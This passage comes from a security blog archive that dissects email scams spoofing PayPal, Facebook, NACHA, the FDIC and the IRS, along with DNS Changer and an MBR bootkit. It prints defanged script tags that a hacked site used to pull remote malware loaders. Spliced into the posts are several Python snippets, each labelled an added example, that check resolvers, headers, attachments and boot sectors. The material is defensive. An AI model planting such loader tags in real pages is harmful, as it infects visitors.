The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>. However, if you were to take a look at the actual normally hidden Header information, you would see that the email came from some other non-related website. The PayPal scam I am looking at came from Brazil:

Received: from [187.56.96.53] (helo=telesp.net.br).

See my article from 2006 for suggestions on how to display email headers.

The PayPal scam message body text is meant to both poke the curiosity of the recipient (by the dollar amount they allegedly sent) and to delay their checking into their PayPal accounts to see if they did make such a payment. Here is how the crooks accomplish these important tasks:


You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...

This payment was sent using your bank account.By using your bank account to send money...


The call to action that they want victims to perform is NOT to log in to their PayPal accounts to investigate this scam (see the sentence above about the payment taking a while to appear), but to click on poisoned links wrapped around keywords in the email message body. These links are wrapped around every word that a PayPal user might normally expect to lead to details about their account. The linked words were as follows:

  • 2T004487YM209135A

  • View the details of this transaction online

  • Help Center | Resolution Center | Security Center

  • h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (not URL in link)

  • h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (not URL in link)


Each one of the above anchor words was wrapped by a link to a compromised website that contained the following contents (placed there when it got hacked):

WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>

Continue reading "Anatomy of a PayPal email scam leading to malware" »

April 23, 2012

New social engineering tricks used in email malware scams

It appears that no matter how many cyber criminals get busted, or botnet command and control servers are taken offline, there is always another scam waiting to take their place. So it is in the case of email scams leading to malware attack kits.

The words and phrases in the subjects and message bodies used by scammers over the last few years have been morphing. We still see some of the old topics being used; recycled is a better word. But, new subjects and message bodies are being developed by clever copy writers who are employed by malware distributors. I want to share some of the recent social engineering topics and hook lines that I have seen in spam/scam emails that are detected by MailWasher Pro and subsequently reported to SpamCop.

The most recent scam is one I don't recall ever seeing before. It seems to target business owners who might hire accounting firms to take care of their books and taxes. It is a very clever scam, leading to a huge exploit kit containing over 18,000 bytes of JavaScript code. Included are over 2 dozen script tags, most of which probe your browser and computer for exploitable plug-ins, like Java, Flash, Adobe Reader and Internet Explorer's ActiveX. If the victim's browser has any of the vulnerable versions of these plug-ins installed, silent exploits take place, resulting in the PC becoming a zombie in a spam and attack botnet. They are also treated to a free installation of a bank account stealing Trojan and maybe even a free scan from a fake anti-virus scanner that demands money to remove the fake detections and the barrage of warnings it fires at you.

Here then are the subjects and message contents of some email scams I analyzed today.

Continue reading "New social engineering tricks used in email malware scams" »

April 6, 2012

Fake Facebook Friend Requests with huge links lead to malware exploit kit

There is an ongoing spam campaign that I have been following since August 24 2011, pretending to be Facebook Friend Requests. However, all of the links contained in these scams lead to compromised websites, where your browser is attacked by criminal exploit kits, like the "Blackhole" or the "Nuclear" exploit kits.

If you are a member of Facebook and receive Friend Requests from senders with odd sounding names, you need to do something proactive before clicking on any links in those emails. You need to hover your mouse pointer over all buttons, images and text links, without pressing any mouse buttons (do not click!). Then, with your pointer over these links, look down at the "Status Bar" on the browser, or message window, or preview pane in the email client you are using, and look carefully at the URL being displayed.

The links and buttons in the Facebook Friend Request scams look like any other Facebook request, with a few exceptions. The photo of the alleged requester is missing, showing an outline of a shadowy head. When you hover over the picture, or name, or the Confirm Request buttons, or the Unsubscribe link, all of the links will be obviously fake, leading to anything other than facebook.com. Furthermore, for the last couple of months, the links are unbelievably huge, occupying multiple lines of codes. Herein lies the weakness in the scam.

Most of the scams spoofing Facebook Friend Requests also lack the line under the name showing the person's statistics, e.g. 37 friends · 29 photos · 13 Wall posts. A real Friend Request contains these stats.


Making sense of what appears senseless
I am going to impart some WIZdom to you to bring you up to speed on the nature of the hostile links in the current (April 2012) fake email Facebook Friend Requests.

Continue reading "Fake Facebook Friend Requests with huge links lead to malware exploit kit" »

April 5, 2012

Fake change of email address notice from American Express is Malware

Right now, the first week of April, 2012, there is a spam run hitting our inboxes spoofing American Express, with fake change of email address notices. These messages are convincing, having stolen images from the actual American Express website.

Here is an excerpt from one which I received a couple of minutes ago:


From: "American Express"
Subject: Confirmation of email address change

Thanks for updating your email address

We changed your e-mail address in our files to {spoofed or harvested email account}. If the new e-mail address is not correct or you did not request this change, please click here,..{spoofed link leads to malware}


If you, or someone you know, was unlucky enough to click on one of these links, that PC will have been attacked by a browser exploit kit. You, or they, need to run a full scan for malware, with updated definitions, in the installed security program. If you have not rebooted the computer since you clicked on the hostile link, run System Restore to a previous time or day on your Windows computer.

If you lack any installed computer security, here are some options for you to try:


Continue reading "Fake change of email address notice from American Express is Malware" »

February 14, 2012

PCs infected with DNS Changer to lose Internet connections on March 8, 2012

The Internet can be a very dangerous place anymore. There are more malicious software (malware) threats out there than you can shake a stick at. The DNS Changer Trojan is one that needs to be mentioned right now. If you own or use a PC infected with the most recent variation of the DNS Changer, you may lose your ability to access the Internet on March 8, 2012.

What does DNS stand for?

DNS stands for Domain Name System. This is a system of electronic devices known as routers which locate websites you want to access by their common name, then translate those names into the numeric codes assigned to the web servers hosting those domains (websites). Every website is hosted on a computer that has a numeric address, known as an IP address, assigned to it. The DNS system searches and drills down through multiple layers of routing details until a numeric match is found for the website domain name you are trying to access.

For instance, my website, wizcrafts.net, is currently hosted on a web server belonging to Bluehost, with an assigned IP address of 66.147.244.184. It is reached after requests are routed from your home or business connection, through any required intermediaries, until the request ends up in Utah, at the facility owned by the hosting company. There, the internal routers sort out which one of hundreds of servers in their facility is actually hosting my humble website. All this happens in the blink of your eye!

It's not just websites that use the DNS system. Your very own Internet connection is also part of that system. You get your Internet connection from a local Internet Service Provider (ISP), via a modem, or Wi-Fi, or cellular network, or hard-wired wide area network. Your connection has an IP address assigned to you by your ISP. When you access the Internet to browse websites you are usually going to use DNS servers belonging to your ISP. These DNS servers relay your requests for websites, or other Internet resources, to various upstream Domain Name Servers around the world.

When you connect to your ISP, their system assigns their primary and secondary (in case one fails) DNS servers to you, to use for accessing the Web. You trust those DNS servers to faithfully relay your requests to the desired target websites, or other resources (newsgroups, IRC, IM, email, ftp locations, online storage, etc). But, what if somehow, those good DNS servers belonging to your ISP were replaced with rogue servers owned by cyber-criminals?
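One way to answer that question for your own machine is to compare the resolvers the system is actually using against the ones you expect (your ISP's resolver range, your own LAN, loopback). The Python check below is an added example written for this page, not part of the original article or of any vendor's DNS Changer checker; the resolv.conf and "ipconfig /all" samples, the 203.0.113.0/24 "ISP" range and the 198.51.100.7 rogue entry are constructed from documentation address space.

```python
import re
from ipaddress import ip_address, ip_network

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_dns_servers(text):
    """Pull resolver addresses out of either resolv.conf text ("nameserver x.x.x.x")
    or the "DNS Servers . . . : x.x.x.x" block of Windows "ipconfig /all" output,
    including the indented continuation lines ipconfig uses for extra servers.
    IPv4 only; the rogue DNS Changer resolvers were IPv4 addresses."""
    servers, in_dns_block = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]            # drop resolv.conf comments
        stripped = line.strip()
        if stripped.startswith("nameserver") or "DNS Servers" in line:
            in_dns_block = True
            servers.extend(IPV4.findall(stripped))
        elif in_dns_block and IPV4.fullmatch(stripped):
            servers.append(stripped)           # ipconfig continuation line
        else:
            in_dns_block = False
    return [ip_address(s) for s in servers]


def unexpected_resolvers(servers, trusted_networks):
    """Resolvers that fall outside the ranges you expect. Anything returned
    here was configured by someone other than you or your ISP."""
    nets = [ip_network(n) for n in trusted_networks]
    return [str(s) for s in servers if not any(s in n for n in nets)]


# Constructed samples using documentation address ranges (RFC 5737).
SAMPLE_RESOLV_CONF = """\
# generated from the ISP's DHCP lease
nameserver 127.0.0.1
nameserver 203.0.113.53
nameserver 198.51.100.7
"""
SAMPLE_IPCONFIG = """\
Ethernet adapter Local Area Connection:
   IPv4 Address. . . . . . . . . . . : 192.168.1.10
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 203.0.113.53
                                       198.51.100.7
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""
# Assumed trusted ranges: loopback, the home LAN and the (constructed) ISP resolver subnet.
TRUSTED = ["127.0.0.0/8", "192.168.1.0/24", "203.0.113.0/24"]


def check(text, trusted=TRUSTED):
    """Resolvers in the given config text that are not in any trusted range."""
    return unexpected_resolvers(extract_dns_servers(text), trusted)


if __name__ == "__main__":
    for name, text in (("resolv.conf", SAMPLE_RESOLV_CONF), ("ipconfig /all", SAMPLE_IPCONFIG)):
        print(name, "unexpected resolvers:", check(text))
```

On a real machine you would paste in your own "ipconfig /all" output (or /etc/resolv.conf) and your ISP's published resolver addresses; a resolver you never configured and your ISP does not own is the symptom to act on.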

Continue reading "PCs infected with DNS Changer to lose Internet connections on March 8, 2012" »

October 10, 2011

Spammed IRS Tax notices lead to Zbot malware infection

There is a currently ongoing spam campaign which sends an official looking document, with images from the US Internal Revenue Service. The subject and body refer to a tax return problem. The recipient is told to read the report at IRS.gov, but the link provided goes offshore, to a look-alike scam web page, serving malware.

I traced down one of these scams that came in today (Oct 10, 2011) and here are my findings.

The link in the email, falsely claiming to go to a report page at the irs.gov, actually led to a website named http://systrmp.com (using standard html code to link to one place, but show the user a different destination). If the intended victim was to hover their mouse or pointer over that link before clicking on it, they would see the true destination in the Status Bar of their email reader (browser or standalone desktop email client).

The message body is written to cause panic in the recipients, causing some to blindly click on the link, without checking out the destination first. Here are the words used to panic recipients into action:


Notice ID: CEXOSTSZUJ8747
Notice: CP01H
Tax year: 2011
Notice date: Mon, 10 Oct 2011 09:11:50 +0100
Page 1 of 1

Important information about your tax return
We are unable to process your tax return

We received your tax return. However, we are unable to process the return as filed.

Our records indicate that the person identified as the primary taxpayer or spouse on the tax return was deceased prior to the tax year shown on the tax form. Our records are based on information received from the Social Security Administration.
Based on this information, the tax account for this individual has been locked.

What you need to do

Visit review page on irs.gov (<-- Hostile link goes here)
Keep this notice for your records.
Department of Treasury
Internal Revenue Service


Continue reading "Spammed IRS Tax notices lead to Zbot malware infection" »

September 15, 2011

Return of fake ACH & invoice emails with malware in attachments

Earlier this week I noted that the spate of fake ACH transaction canceled spam emails had subsided. Well, no time off for crime fighters. They returned today, along with some fake invoices and "changelogs" in spam messages, sent from infected computers in spam botnets.

My email spam-screening program is MailWasher Pro, which uses a combination of several tactics to determine if an incoming message is good or bad, friend or foe. The program allows users to compose their own spam detection filters, based upon various criteria found in email messages; some hidden, some visible. I write and publish filters for MailWasher Pro users and some of the most effective filters right now are the ones that detect ACH scams and emails with Zip file attachments.

All of the ACH fraud messages, along with the fake invoices and changelogs, contain malware downloaders inside the attached files. Anybody running a Windows computer who misguidedly opens the attached zip file and its enclosed .pdf.exe file, will have a botnet Trojan downloader installed within seconds. This downloader then goes to work, behind the scenes, to download and install other malware, including the infamous Zbot, aka Zeus bank credential stealing Trojan.

The subjects and come-ons used in this latest spam run are listed below, in my extended comments.

Continue reading "Return of fake ACH & invoice emails with malware in attachments" »

September 2, 2011

ACH email scams with malware in attachments continues

Earlier this week there was a drop-off of the previous spam run of fake ACH Payment Canceled emails, all loaded with malware inside their attached files. They were replaced by a blast of FDIC scams. Now, the ACH scams have returned, with a vengeance.


The new subject in today's spam blast is: ACH Transfer Review. The forged sender is an account name like this: ach [email protected]. The body text is as follows:

Dear Client,
ACH transfer (ID:) is going to be reviewed because of the incorrectly input data
when sending the payment.

Important:
Please, fill in the application form attached attentively and send it to us.
After that your transfer will be processed.

If you have any questions or comments, contact us at [email protected].
Thank you for using www.nacha.org

(NAME REMOVED)
NACHA Risk Management Services

The attached "form" is currently named: "form-62091.zip" and it contains a Trojan Horse (currently Zbot, a.k.a. Zeus) that will infect your computer with malware that intercepts keystrokes when you log into a bank, or other financial organization being targeted by the perpetrators. It then sends your login credentials to the criminals who are renting the botnet, whose member computers are sending these scams to you and everybody else. Some variants of the ACH scams actually install a botnet (currently "Bredolab") controller, which then downloads the other bad stuff to your PC, and possibly to your networked PCs.

The email claims to come from the headquarters of ACH, but the headers show something different. Look at these three "Received: from" lines, obtained from three different spam emails today:


Received: from [115.118.159.231] (helo=cgorq.com)
Received: from [178.123.157.77] (helo=sqibyat.com)
Received: from [187.117.248.91] (helo=hcyayyax.com)

The IP 115.118.159.231 belongs to TATA Communications, in India. The IP 178.123.157.77 is assigned to the Republic of Belarus. Last, 187.117.248.91 belongs to someone with a hacked computer in Brazil. The real ACH payment system is managed by Nacha.org, a US based company, whose servers are here, in the USA. NACHA stands for: National Automated Clearing House Association.

The real NACHA does not send email alerts to individual bank customers. It only deals with the banks and credit unions themselves. Unless you work for a bank, or credit union, you should never ever receive any email from nacha.org (or nacha.us, .net, or .com).
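The same three facts can be pulled out of a raw header block by script: the IP the receiving server actually accepted the connection from, the HELO name the sending host announced, and whether that name is even inside the domain the From: line claims. This Python snippet is an added example, not the author's code or a MailWasher filter; the multi-line header block, mx.example.net and the 192.0.2.10 forged hop are constructed, while the IP/HELO pairs are the ones quoted above.

```python
import re

# The "Received: from [ip] (helo=name)" form quoted in this post. The bracketed
# IP is what the receiving server saw on the TCP connection; the helo name is
# whatever the connecting host chose to announce.
RECEIVED_RE = re.compile(
    r"^Received:\s+from\s+\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\s+\(helo=(?P<helo>[^)\s]+)\)",
    re.MULTILINE,
)


def received_hops(headers):
    """(ip, helo) for each matching Received line, topmost first."""
    return [(m.group("ip"), m.group("helo").lower())
            for m in RECEIVED_RE.finditer(headers)]


def in_domain(host, domain):
    """True when host is domain itself or a subdomain of it (look-alikes fail)."""
    return host == domain or host.endswith("." + domain)


def assess_origin(headers, claimed_domain):
    """Compare the hop your own server recorded with the domain the From: line claims.

    Only the topmost Received line was added by your server; every line below it
    arrived inside the message and can say anything the sender likes, so the
    verdict rests on the topmost hop alone.
    """
    hops = received_hops(headers)
    if not hops:
        return {"verdict": "no parsable Received line"}
    ip, helo = hops[0]
    consistent = in_domain(helo, claimed_domain)
    return {
        "connecting_ip": ip,          # look this up in WHOIS, as the post does
        "helo": helo,                 # sender-supplied, trivially forged
        "claimed_domain": claimed_domain,
        "verdict": "consistent" if consistent else "suspicious",
    }


# Constructed header block: the topmost hop is the Belarus address quoted above;
# the second Received line is the kind of nacha-looking hop a spam bot can
# prepend to its own message, and the assessment deliberately ignores it.
SAMPLE_HEADERS = """\
Received: from [178.123.157.77] (helo=sqibyat.com)
    by mx.example.net with esmtp; Fri, 02 Sep 2011 03:12:44 -0400
Received: from [192.0.2.10] (helo=mail.nacha.org)
    by sqibyat.com; Fri, 02 Sep 2011 07:05:02 +0000
From: ach@nacha.org
Subject: ACH Transfer Review
"""

if __name__ == "__main__":
    print(assess_origin(SAMPLE_HEADERS, "nacha.org"))
    for line in ("Received: from [115.118.159.231] (helo=cgorq.com)",
                 "Received: from [187.117.248.91] (helo=hcyayyax.com)"):
        print(assess_origin(line, "nacha.org"))
```

A "consistent" verdict is not proof of legitimacy, since the HELO name is free text, but a mismatch is enough to stop trusting the message, and the connecting IP is the one worth looking up.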

Continue reading "ACH email scams with malware in attachments continues" »

August 30, 2011

ACH Email Fraud Morphs Into FDIC Notification Scam

It was only a couple of days ago (8/26/2011) that I published a blog article warning people about the threats contained in fraudulent emails claiming that an ACH transfer had been canceled and that the recipient needed to read the report in the attached file.

Beginning at 3 AM, EST, I received four consecutive email scams in 15 minutes, with the subject: "FDIC notification," with the forged sender (the actual "sender" is an infected PC in a spam botnet): "[email protected]," and the following body text:


Dear customer,
Your account ACH and WIRE transaction have been temporarily suspended for
security reasons due to the expiration of your security version. To download and install the newest installations read the document(pdf) attached below.
As soon as it is setup, you transaction abilities will be fully restored.

Best Regards, Online Security departament, Federal Deposit Insurance Corporation.


The attached file is currently named "FDIC_document.zip" - although the filename may change soon.

Like the UPS and ACH scams that preceded it, this scam contains a variant of the Zeus or Zbot Trojan Horse. Its purpose is to install hidden malware that watches for you to visit targeted financial institutions, or your website's control panel, or PayPal, etc. Once you do it intercepts your login credentials and forwards them to the criminals running these scams. Your bank accounts, PayPal accounts and God knows what else may be emptied before you know what hit you!

If you use MailWasher Pro to screen your incoming email for spam and threats in attachments, my custom ZIP Attachment filter will alert you to these and similar threats. Never open the attachments in these scams! Delete the email on sight! Opening these messages will launch the installer for the Zbot. Your PC will not only have the Zeus keylogger installed, but will be made a part of the Botnet from which you received your recruitment message.

August 26, 2011

Return of ACH Payment Canceled - Email Malware Scams

For the last 2 days I have seen a slowly building spam campaign featuring a previously used trick Subject: "ACH Payment (7 numbers) Canceled." The message body is short and sweet, along the line of the following:


The ACH transaction,
recently initiated from your checking account (by you or any other person),
was canceled by the other financial institution.

Rejected transaction

Reason for rejection: See details in the attachment


The "report" is in a double extension file, with a name like: "report_082011-65.pdf.ZIP (ZIP archive, Adobe PDF)" - although future variants may arrive with just a .zip or just a .pdf extension.
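The double-extension names in this post, the .pdf.exe inside the zip from the September 15 post, and the form-62091.zip / FDIC_document.zip attachments from the other ACH posts can all be screened by the same filename logic, applied both to the attachment itself and to the members inside a zip. This Python code is an added example, not the MailWasher ZIP Attachment filter or anything from the original posts; the in-memory zip it builds is a constructed stand-in containing filler bytes, not real malware.

```python
import io
import zipfile

# Extensions Windows runs as a program when the file is double-clicked.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Extensions the scams borrow to make the file look like a harmless document.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}
ARCHIVE_EXTS = {".zip", ".rar"}


def extensions(name):
    """All dotted extensions of a file name, lower-cased, e.g. ['.pdf', '.exe']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return ["." + part for part in base.split(".")[1:]]


def name_findings(name):
    """Reasons a single file name looks like a malware-in-attachment scam."""
    exts = extensions(name)
    findings = []
    if exts and exts[-1] in EXEC_EXTS:
        findings.append(f"{name}: runs as a program ({exts[-1]})")
    if len(exts) >= 2 and exts[-2] in DOC_EXTS and exts[-1] in EXEC_EXTS | ARCHIVE_EXTS:
        findings.append(f"{name}: document-looking double extension {exts[-2]}{exts[-1]}")
    return findings


def zip_findings(data):
    """Apply name_findings to every member of a zip held in memory, without extracting."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            findings.extend(name_findings(info.filename))
    return findings


def attachment_findings(filename, data=None):
    """Screen an attachment by its own name and, for zips, by its member names."""
    findings = name_findings(filename)
    if data is not None and extensions(filename)[-1:] == [".zip"]:
        findings.extend(zip_findings(data))
    return findings


def build_sample_zip():
    """Constructed stand-in for the scam attachment: a zip whose only member
    is a .pdf.exe. The bytes are filler, not a real program."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report_082011-65.pdf.exe", b"MZ-filler, not an executable")
    return buf.getvalue()


if __name__ == "__main__":
    for name in ("report_082011-65.pdf.ZIP", "FDIC_document.zip", "invoice.pdf"):
        print(name, "->", name_findings(name))
    print("form-62091.zip ->", attachment_findings("form-62091.zip", build_sample_zip()))
```

Note that "FDIC_document.zip" alone produces no finding: a zip is not suspicious by its name, which is why the check has to look inside the archive at member names, and why a mail filter that simply flags every zip attachment (as the MailWasher filter described in these posts does) trades precision for not missing the next renamed variant.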

The From line is usually: "account manager" ([email protected], or [email protected]). You will be getting these sent to every one of your email accounts, should you have multiple accounts, like I do. Domains with email are especially hard hit in today's spam campaigns.

The actual "sender" is a PC in a spam botnet, operating under commands from the Bot Master running this show. All reply-to and From information is forged.

The payload in the current crop of malware in attachments is the "Zeus" aka: "ZBot" keylogger Trojan. The installer may also make the victim's computer a member of the same botnet from which their scam message was sent. This perpetuates and increases the size of the botnet and steals money from victims as they log into banks and payment portals targeted by this Zeus variant.

My advice to recipients of one of these, or future variations of these scams, is to phone your bank, or financial institution, and ask them to check your account for problem transactions. Note, there have been some spam campaigns that include a fake contact phone number that actually leads to people hired by the criminals running particular campaigns. So, your safest bet is to look up the number for your bank, or flip over your debit or credit card and call the number listed on it.

Interestingly, these malware in attachments scams began on August 25, just after the previous run of UPS malware scams ended. No doubt, the same botnet is sending both, rotating subjects and body text and attachment names, via templates downloaded to the zombie computers in the botnet.

I delete all such malware laden spam messages, which are automatically flagged by one or more custom spam filters I write, by my email screening program: MailWasher Pro - (learn about MailWasher Pro here). My advice to you is to delete them on sight, without opening them. Phone your bank if you are worried.

If your bank sends you email messages and alerts about problems, the message will include your proper name. None of these scams include any personal names as salutations. That is red flag number one in all such malware and phishing scams.

Stay alert to scams in spams. Do not open any email attachments out of curiosity. Only open attachments you are expecting, from senders you are expecting them from, and then, only if you have modern, fully updated anti-virus/anti-malware protection running on your computers.

June 28, 2011

New variant MBR rootkit removal requires Windows or repair disk

On June 22, 2011, a researcher at Microsoft's Malware Protection Center published disturbing findings about a new variant of a rootkit named "Popureb." This variant, dubbed Popureb.E, is a Master Boot Record (MBR) infector, as were its predecessors. But, this variant is different from the others in that it has a unique defense against being removed by the usual methods.

Rootkits are bad news for those whose computers are infected with them. They hide deep inside the operating system and act as puppeteers for other badware files. Rootkits can act as downloaders of malware and upgrades to it, as spam engines, and as protectors of the malware programs they have installed. They can even act as a strange kind of anti-virus, by uninstalling rival malware files.

"Kernel mode" rootkits can usually be removed by using advanced anti-virus program modules that stop the rootkit process in memory, enumerating its normally hidden files and start-up Registry entries, then deleting them during a reboot cycle.

Boot sector, or MBR rootkits are a horse of another color! Boot sector rootkits are the worst of the worst. They hide in the first sector (0) of your boot hard drive and are loaded along with the hardware devices, as the computer boots up, before the OS is active. By loading at the beginning of the boot-up cycle, MBR rootkits, also known as "Bootkits," are able to evade detection by normal anti-virus programs. Even if detected, removal often requires rewriting the MBR, which overwrites the bootkit code with legitimate start-up code.

The most common way to remove standard MBR rootkits and other sector 0 infectors is to use whatever recovery console or repair option exists on that PC. Windows XP and 2000 had an installable Recovery Console, which was added to the boot options menu and offers the FIXMBR command. Windows Vista and Windows 7 install repair options that become accessible when you restart and tap the F8 key repeatedly; the option is called Repair Your Computer, and from its command prompt the equivalent command is bootrec /fixmbr.

So, let's say you have an XP, Vista or Windows 7 computer that acquires a boot sector infector and you have either the Recovery Console or the Repair Your Computer option available during the initial boot cycle. If you go into one of those options and choose Startup Repair (Vista/7), or use the Recovery Console to rewrite the MBR (FIXMBR), will it kill the newest bootkits? Not if it is the one dubbed "Popureb.E."
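Reading sector 0 back after a repair is the check that separates a real fix from a reported one. The following Python is an added example, not code from this post or from Microsoft's write-up: it parses a 512-byte MBR (boot code, partition table, 0x55AA signature) and wraps a FIXMBR-style rewrite in a read-back comparison. The Disk class and its write hook are a constructed stand-in for a raw block device, and the hook models only the generic case of a driver that tampers with writes, not any particular bootkit. On a real Windows machine the same read would be done against \\.\PhysicalDrive0 from an elevated process.

```python
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 446            # bytes 0..445: the boot loader code a bootkit replaces
PART_TABLE_OFF = 446           # four 16-byte partition entries follow
SIGNATURE_OFF = 510
MBR_SIGNATURE = b"\x55\xaa"


def parse_mbr(sector: bytes) -> dict:
    """Split sector 0 into a boot-code hash, the partition entries and the signature."""
    if len(sector) != SECTOR:
        raise ValueError("an MBR is exactly 512 bytes")
    parts = []
    for i in range(4):
        # entry layout: status, CHS start (3), type, CHS end (3), LBA start, sector count
        status, ptype, lba_start, count = struct.unpack_from(
            "<B3xB3xII", sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:
            parts.append({"bootable": status == 0x80, "type": ptype,
                          "lba_start": lba_start, "sectors": count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": parts,
        "signature_ok": sector[SIGNATURE_OFF:] == MBR_SIGNATURE,
    }


class Disk:
    """Stand-in for a raw block device (only sector 0 is modelled).
    write_hook, if given, simulates a driver-level filter tampering with writes;
    it is a constructed illustration, not a model of any specific bootkit."""

    def __init__(self, sector0: bytes, write_hook=None):
        self._sector0 = bytearray(sector0)
        self._write_hook = write_hook

    def read_sector0(self) -> bytes:
        return bytes(self._sector0)

    def write_sector0(self, data: bytes) -> None:
        if self._write_hook is not None:
            data = self._write_hook(bytes(self._sector0), data)
        self._sector0[:] = data


def drop_writes(current: bytes, requested: bytes) -> bytes:
    """Hook that silently discards the write: the disk keeps its old contents."""
    return current


def rewrite_boot_code(disk: Disk, clean_code: bytes) -> bool:
    """Do what FIXMBR / bootrec /fixmbr do (replace the boot code, keep the
    partition table), then read sector 0 back and report whether the write stuck."""
    if len(clean_code) > BOOT_CODE_LEN:
        raise ValueError("boot code too long")
    current = disk.read_sector0()
    wanted = clean_code.ljust(BOOT_CODE_LEN, b"\x00") + current[BOOT_CODE_LEN:]
    disk.write_sector0(wanted)
    return disk.read_sector0() == wanted


def make_sample_mbr() -> bytes:
    """Constructed MBR: placeholder boot code and one bootable NTFS partition at LBA 63."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c".ljust(BOOT_CODE_LEN, b"\x90")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 63, 2_000_000)
    return boot_code + entry + b"\x00" * 48 + MBR_SIGNATURE


if __name__ == "__main__":
    mbr = make_sample_mbr()
    print(parse_mbr(mbr))
    print("clean disk rewrite verified:", rewrite_boot_code(Disk(mbr), b"\xeb\xfe"))
    print("hooked disk rewrite verified:", rewrite_boot_code(Disk(mbr, drop_writes), b"\xeb\xfe"))
```

The point of `rewrite_boot_code` returning the comparison rather than the write's status is that a repair tool which trusts the driver's "success" has no way to notice that nothing changed; only an independent read of sector 0 does.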

Continue reading "New variant MBR rootkit removal requires Windows or repair disk" »


October 3, 2010

My Spam analysis & filter updates for the week of Sept 27 - Oct 3, 2010

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics. These reports can help you adjust the order of your own spam filters.

MailWasher Pro is a POP3 and IMAP email spam screener that checks email before it is downloaded to your desktop email client. It can be set to delete recognized spam either manually or automatically when a user-defined filter, or the built-in learning filter, or a blacklist entry, or known spam source is matched, or an attached virus is detected.

My incoming spam levels have decreased 2% this week, to 58% of all my incoming email. Most of the spam was typical junkmail for counterfeit Chinese watches, fake Cialis and Viagra, illicit prescription drugs and male enhancement scams. There were also some new variations of malware in attachments scams, in fake CV resumes in zip files. There was a dangerous link spam campaign, posing as LinkedIn messages, leading to serious exploit attacks and the Zeus banking credential stealing Trojan. Finally, there was spam for fake diplomas, and some pirated OEM software, hosted on Russian domains.

The LinkedIn attack was coordinated and sent (via botnets) by the same people behind the malware-infected fake CV resumes (Zeus Trojan). They are headquartered in Ukraine and 5 of them were just arrested this week. Another 11 were arrested in the UK and dozens more were arrested or had warrants issued in the USA. Almost all are Russians, Ukrainians and people from other Eastern European countries. Quite a few in the US are Russian students here on J1 student visas.

The classifications of spam in my analysis (below) can help you adjust your email filters according to what is most common, on a weekly basis. If you are using my custom MailWasher Pro filters, keep the filters for the highest percentage categories of spam near the top of the filters list, to minimize the impact on your CPU when analyzing incoming messages for spam content.

Since virtually all spam is now sent from, and hosted on, hijacked PCs that are zombie members of spam botnets, and every sender address is forged, there is no point in complaining to the listed From or Reply-To address. Those addresses are inserted by the same script that composes the spam on the compromised PCs, and their owners are innocent victims themselves, whose harvested names are reused as forged senders.

Sometimes your own email address is forged as the sender as well as being the recipient. (Forging an innocent third party's address as the sender, so that the bounces and complaints land on that party, is what is properly called a "Joe Job"; here the same forgery is simply aimed at you.) The danger is that a whitelisted address gets a free pass. Fortunately, MailWasher Pro has a custom filter option that overrides the "Friends" list (a whitelist of approved senders), allowing user-created spam filters to read the content and flag or auto-delete spam that uses one's own account as the forged sender.
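The two points above, ordering filters by how often each category fires and letting a content filter override the whitelist when your own address is forged as the sender, fit in a few lines. This Python is an added example and not MailWasher Pro's code; the rules, addresses and the week's worth of messages are all constructed:

```python
import re
from collections import Counter

OWN_ADDRESS = "me@example.com"
WHITELIST = {OWN_ADDRESS, "friend@example.net"}

# Constructed filter rules, in the order a user might have typed them.
# Each is matched against "Subject: <subject>\n<body>".
RULES = [
    ("fake-cv-malware", re.compile(r"attach(ed|ment).*\b(cv|resume)\b.*\.zip\b", re.I | re.S)),
    ("linkedin-phish", re.compile(r"linkedin.*(invitation|reminder).*https?://\d{1,3}(\.\d{1,3}){3}", re.I | re.S)),
    ("fake-diploma", re.compile(r"\b(diploma|degree)\b.*\bno (study|exam)", re.I | re.S)),
    ("pharma", re.compile(r"\b(viagra|cialis|male enhancement)\b", re.I)),
    ("counterfeit-goods", re.compile(r"\breplica (watch|rolex)", re.I)),
]

# Constructed sample of one "week" of mail.
MESSAGES = [
    {"from": "friend@example.net", "to": OWN_ADDRESS, "subject": "Lunch?",
     "body": "See you at noon."},
    {"from": OWN_ADDRESS, "to": OWN_ADDRESS, "subject": "Cheap Viagra today",
     "body": "Best prices, no prescription."},
    {"from": "hr@jobs.example", "to": OWN_ADDRESS, "subject": "My CV",
     "body": "Please find attached my resume in cv_2010.zip"},
    {"from": "noreply@linkedin-mail.example", "to": OWN_ADDRESS, "subject": "LinkedIn Reminder",
     "body": "You have 1 invitation waiting: http://192.0.2.10/in.php"},
    {"from": "sales@example.org", "to": OWN_ADDRESS, "subject": "Replica Rolex watches",
     "body": "Swiss quality, low prices."},
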